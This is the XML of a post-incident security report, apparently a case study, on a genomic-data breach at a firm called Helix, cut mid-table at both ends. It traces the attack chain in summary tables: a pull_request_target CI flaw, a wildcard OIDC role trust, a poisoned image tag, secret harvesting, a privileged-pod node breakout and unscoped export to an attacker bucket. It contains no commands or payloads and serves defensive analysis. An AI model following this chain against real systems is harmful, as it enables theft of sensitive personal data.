              <w:t>Mutable tag; consumed by tag (F9)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>helix-prod (K8s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>helix-prod</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Runs sequencing pipelines</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Stale binding + automount + no admission (F12–F14)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>HelixDataExport</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>helix-prod</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Reads archive, delivers reports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Destination param unscoped (F17)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>helix-sequences</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>helix-prod</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Genome object store (~210k people)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Bulk-read; LIS cross-check unavailable to SOC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOC + runbooks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>External contract</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>24h monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Sees cloud+storage only; handbook misses class (F23/F32)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Data flow (normal vs attack)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>Normal day: hospital order → pipeline runs pinned image → reads its own samples → delivers to that hospital's bucket → LIS records the delivery (1:1). Attack: stranger's PR → wildcard role → poisoned image → every pipeline runs attacker code → secrets + nodes fall → 41 role hops with zero matching runs → 31k reads, 4.9k orders → delivery to attacker's bucket. Same pipes, different destination. Nothing 'broke' — the pipes were just never told where they're allowed to go.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>4. Findings F1–F32 — what matters, what helped, what's noise</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>We split all 32 findings into three buckets. Rule of thumb: Core = the attacker walked through here (remove it, the chain breaks). Suspicious/Helped = made the attack possible, invisible, or unprovable. Noise = loud but unrelated — included so you don't chase it. (Full reasoning per finding ships in docs/01-findings-categorisation.md.)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.1 Core — the attack path (20 findings)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ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Why it's core</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Blog names roles + federation design</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Free recon; attacker planned without guessing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Public repo, 41 external PRs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Front door + cover traffic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>pull_request_target: attacker code + base secrets, pre-review</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Privilege-boundary failure; the entry point</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Throwaway PR 14 Nov; clean OIDC sub</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Proves who/when; token looks legitimate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>HelixDeploy trusts repo:helix-diagnostics/*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Wildcard lets low-trust token open prod door</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Self-hosted runners in helix-build</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Attacker code lands inside account boundary</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>stable tag pushed 14 Nov 03:51; pull-by-tag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>One push poisons all future runs silently</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Push as HelixPipelineOps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Proves hop 1 (Deploy→PipelineOps)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>14k secret get/list 15–22 Nov</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Poisoned pods harvesting credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>pipeline-reader → system:authenticated (stale, 2023)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Every pod reads every secret</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Default token automount on all pods</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Every workload gets the over-privileged identity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Privileged + hostPath / pod 16 Nov; no admission control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Container→node breakout</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PipelineOps→DataExport 41×, zero matching runs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Hop 2; breaks 1:1 invariant</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DataExport writes to any named destination</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Exfil valve; no allow-list</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>31k reads vs ~2.4k/month baseline</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Scale of theft; matches public dump</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>LIS: only 4,900 real deliveries</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Cross-check killing innocent explanations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F25/F26</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3 hops, 3 approvers, 3 years, never traced</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Governance root cause; composed reach = full archive + arbitrary write</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Public upload 11 Jan via hosting IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Deliberate anonymised disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F31</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Reads complete 6 Jan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Exfil window end; data left Helix</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.2 Suspicious / helped — enablers and blind spots (10 findings)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ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Why it's here (not Core)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI log (90d) vs audit (400d) mismatch; old CI gone</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Hints at possible rehearsal; unprovable — a worry, not evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Runners persist outside /work</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Implant plausible, even likely; unverifiable (F15) — rebuild, don't assert</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>No node/runtime telemetry (agent never deployed)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Deletes evidence of what ran; permanent hole</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Privileged-pod alert fired, closed 'expected'</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
